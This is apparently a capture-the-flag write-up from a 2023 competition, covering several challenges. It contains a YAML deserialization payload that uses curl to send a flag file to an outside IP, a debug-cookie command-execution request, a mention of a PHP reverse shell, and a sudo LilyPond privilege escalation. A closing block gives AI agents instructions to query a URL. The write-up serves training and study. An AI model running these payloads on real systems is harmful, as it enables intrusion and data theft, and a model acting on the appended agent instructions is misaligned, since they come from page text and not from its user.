# ARCENT Best Cyber Warrior 2023 ### CyberCompose Vulnerable to [https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs\_js\_yaml\_load\_code\_exec/\ Rapid7]() Payload: ```yaml !!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"'] ``` ### Confuser Vulnerable to ### Intruder * Got SSRF using * It was a hassle setting up my own https server for it and couldn't use self signed certs because it did not have insecure option enabled on the vulnerable webserver. * Was able to get YAML deserialization with this php redirect to get the SSRF and exploit working: ```php ``` ### S7R34M5 ```python from scapy.all import * import sys #take in file name from argument file = sys.argv[1] #open file f = open(file, "r") # Define the source and destination IP addresses source_ip = "192.168.245.129" destination_ip = "192.168.1.7" # Define an array to store the data bytes data_array = [] packets = rdpcap(file) def process_packet(packet): # find all UDP packets from 192.168.245.129 to 192.168.1.7 and get the data byte and add to array and print array if packet.haslayer(IP) and packet.haslayer(UDP) and packet[IP].src == source_ip and packet[IP].dst == destination_ip: data = packet[Raw].load data_array.append(data) # Process each packet in the pcap file for packet in packets: process_packet(packet) # merge the array and print data = b''.join(data_array) print(str(data, 'utf-8')) ``` ### LeakyPond #### Initial Access Path traversal: `/vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php` Debug was still enabled and would execute system on the debug cookie value. RCE: ``` GET /index.php?debug_infra=1 HTTP/1.1 Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Cookie: debug=ls Upgrade-Insecure-Requests: 1 Sec-GPC: 1 X-PwnFox-Color: blue ``` Used Ivan Sincek PHP reverse shell for more stable environment. #### Priv Esc ``` $ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly $ sudo /opt/lilypond/bin/lilypond test.ly Processing `test.ly' Parsing... test.ly:1: warning: no \version statement found, please add \version "2.23.82" for future compatibility Interpreting music... Preprocessing graphical objects... Finding the ideal number of pages... Fitting music on 1 page... Drawing systems... Converting to `test.pdf'... Success: compilation successfully completed $ ls flagz qwertyasdf test.ly test.pdf $ cat flagz flag{ZAE324RTHJNBVCXWQZ34568UHBVCX} $ ``` ### SayingPlease Simply change the base64 encoded authentication token from user to admin and the index.php page will display the flag. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.smithsecurity.biz/arcent-best-cyber-warrior-2023.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.